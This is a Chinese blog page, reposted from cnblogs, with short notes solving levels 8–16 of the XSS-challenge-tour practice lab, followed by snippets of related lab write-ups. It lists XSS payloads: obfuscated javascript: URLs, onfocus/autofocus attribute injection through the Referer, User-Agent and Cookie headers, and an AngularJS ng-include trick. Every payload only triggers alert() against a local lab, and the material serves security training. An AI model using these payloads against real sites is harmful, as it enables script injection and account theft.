xsslabs靶机解题_XSS-challenge-tour靶机测试笔记

最新推荐文章于 2024-01-16 08:00:00 发布
最新推荐文章于 2024-01-16 08:00:00 发布
阅读量150 收藏 1
点赞数
文章标签: xsslabs靶机解题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39867559/article/details/111509711
版权

-使用vulstudy一键搭建靶机

8 检测href src on data字符并添加下划线,同时对输入的双引号进行html编码

Payload: 使用unicode编码,unicode编码就是在ascii编码前加

orgCode=''

print ';'.join('{}'.format(ord(x)) for x in orgCode)

javascript:alert(1)

参考:https://programmer.help/blogs/xss-challenge-tour-by-reading-the-code.html

javas%09cript:alert()

javas%0acript:alert()

javas%0dcript:alert()

9 Payload: javascript:alert(1)//http://

考察绕过strpos

10

Payload: " autofocus="" οnfοcus="javascript:alert(1)" type="

利用type=""覆盖掉input的隐藏type,从而执行onfocus

11 Payload: 在refer处添加 " autofocus="" οnfοcus="javascript:alert(1)" type="

12 Payload: 在user-agent处添加 " autofocus="" οnfοcus="javascript:alert(1)" type="

13 Payload: 在cookie中user处添加 " autofocus="" οnfοcus="javascript:alert(1)" type="

14 页面生成cookie有问题

15 Payload: http://10.150.10.186:8091/level15.php?src='level6.php'

ng-include 为AngularJS 指令 ,主要用来包含其他文件,我们可以包含之前的文件来插入xss。注意这儿使用时浏览器会访问googleapis.com失败导致刷不出来

16 考察绕过空格

Payload:

标签:XSS,http,8091,challenge,192.168,alert,tour,php,Payload

来源: https://www.cnblogs.com/zongdeiqianxing/p/13450722.html

weixin_39867559
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网安学习日志 XSS靶机训练(xss-labs-master)(1-10)
qq_41819426的博客
01-19 5087
1.第一关 页面中我们并没有看到输入框,但是我们看到url中可以进行name值的修改。 看起来应该没有任何的过滤,我们直接输入语句尝试: <script>alert(1)</script> 这里还可以用很多方法,以下列举一些常用的方法: <input type=“text” onmouseover=alert(1)> <a href="javascript:alert(1)">a</a> <a onmouseover=“javasc
XSS-challenge-tour(1-10)
qq_50650027的博客
10-17 584
在开始XSS-challenge-tour前我们先学习一下XSSXSS是一种利用网页在开发时留下的漏洞,输入javascript等代码完成所想完成的事情,在 XSS中要注意两点 1、输入 2、输出 ,输入就是在传参之类的传输到HTML代码中,最重要的是第二点输出,这里的输出并不是指在页面中输出是指输入的代码在HTML中输出的位置,在HTML代码中输出的位置闭合标签输出javascript等代码完成自己想要做的事情,在XSS-challenge-tour中只要触发了alert事件就算通关 level 1
xss-challenge-tourXSS靶场)1-10
00勇士王子的博客
09-06 847
第一关 第一关是最简单的,什么限制都没有,直接上最普通的xss代码实现弹窗 <script>alert(‘xss’)</script> payload <script>alert('xss')</script> 第二关 直接输入第一关的代码,没有弹窗,F12看一下代码,尝试进行闭合 下面是包含我们之前输入的内容的代码 <input name="keyword" value="<script>alert(/xss/)</scr.
XSS练习
haha1314的博客
07-21 864
0x00 function render (input) { return '<div>' + input + '</div>' } 没有丝毫的过滤,且在标签中很简单直接写payload <script>alert(1)</script> 0x01 function render (input) { return...
小白简述XSS靶机(一)
yuchen的博客
03-24 1226
配置环境 虚拟机:Windows7–>IP:192.168.50.248 工具:phpstudy5.4.45 浏览器:火狐渗透版 靶场:链接:https://pan.baidu.com/s/1UTosrHqG6rIoOEIiFcF-Rw 提取码:1234 第一关 先输入XSS的代码 <script>alert(1);</script> 直接弹窗了,第一关没啥难度 第二关 还是一样,先输入代码 <script>alert(1);</script>
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
xsslabs靶机解题_xss-labs-master靶机1-20关解题思路
weixin_39714191的博客
12-19 441
xss-labs-master靶机xss-labs作者在github上发布的后来不知道为什么就把它删了,可能是因为这个靶机属于静态页面有一个通用的推广方式(具体在后面),不过还是希望读者使用实战中的攻击手段学习,这个靶机是对XSS漏洞的专项练习,一共有二十关,也是小白的看门砖吧!比如现在的我!大哭!!!!在这篇文章中,默认读者已有WEB渗透测试相关知识,以及PHP、HTML等相关知识。xss-l...
xss Challenge 题解
为之的博客
02-16 524
第一关 <script>alert(document.domain)</script> 第二关 用第一关的代码试了下,看源码发现直接赋值到value上,所以可以对value括号闭合 "><script>alert(document.domain)</script> 第三关 多了个选择框,前面一个输入框怎么输都没...
XSS Challenges 题解__进行中
流云阁
04-26 752
地址:http://xss-quiz.int21h.jp/stage 1:input: &lt;script&gt;alert(document.domain)&lt;/script&gt;stage 2:hint: close the current tag and add SCRIPT tag...------&gt; value="" 里面闭合input:   "&gt;&lt;script...
xss挑战(超详细小白)
weixin_64655821的博客
09-22 1321
xss挑战前十关
XSS注入之xss-labs
m0_60716947的博客
05-02 3349
(一)配置环境 (1)phpstudy 的安装 这里可以去看看我写的另外一个文章 SQL注入之sqli-labs_清丶酒孤欢ゞ的博客-CSDN博客 这里面详细的讲了phpstudy的安装与搭建。 (2)xss-labs 的安装 mirrors / do0dl3 / xss-labs · GitCode 点击克隆里面的下载源码,随便选一个形式,然后将文件解压到 phpstudy 下的www 目录下 打开 phpstudy 中的 apache ,在浏览器中输入 127.0.0.1/xss-lab
xss-labs 小结
China
04-09 315
xss-labs hgfghf ghfhgj XSS总结 思路总结 1、当服务器未对输入值做任何过滤原样echo ? 反射性xss 流程总结 level1 有个回显,所以就可以选择插入一个payload <script>alert(‘xss’)</script> #alert是一个弹窗,所有的js代码都要放在<script>里面才会被当作js代码执行 url框的name后面 当服务器未对输入值做任何过滤原样echo ? 通过查看level1.php得知 $s
XSS漏洞:xss-labs靶场通关
最新发布
qq_68163788的博客
01-16 2179
xss-lab是一个旨在帮助安全研究人员、开发人员和安全爱好者学习和理解跨站脚本攻击(XSS)的项目。它通常包括一系列设计精良的实验室环境,用于模拟真实世界中可能遇到的XSS漏洞场景。这些实验室环境通常包括各种不同类型和难度级别的XSS漏洞,以帮助学习者逐步提高他们的技能。 通过xss-lab项目,用户可以学习如何利用XSS漏洞来攻击网站、窃取用户信息、执行恶意代码等。同时,用户也可以学习如何防御和修复这些漏洞,从而提高网站的安全性。 xss-lab项目的目的是通过实践操作的方式来加深对XSS攻击的理解
xss-labs靶场通关详解
rev1ve的博客
08-30 1412
xss-labs通关详解1-20关
xss靶机训练【实现弹窗即成功】
Miracle_ze的博客
07-29 3737
xss的绕过
vulnhub靶机实战-My-cmsms靶机
09-29
My-cmsms是一个基于MyCMS搭建的靶机,提供了一系列安全漏洞供网络安全爱好者进行渗透测试和学习。本文档以第26页开始,涵盖了两个关键环节:主机发现和端口扫描。 首先,我们通过ARP协议进行主机发现(7.1.1)。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值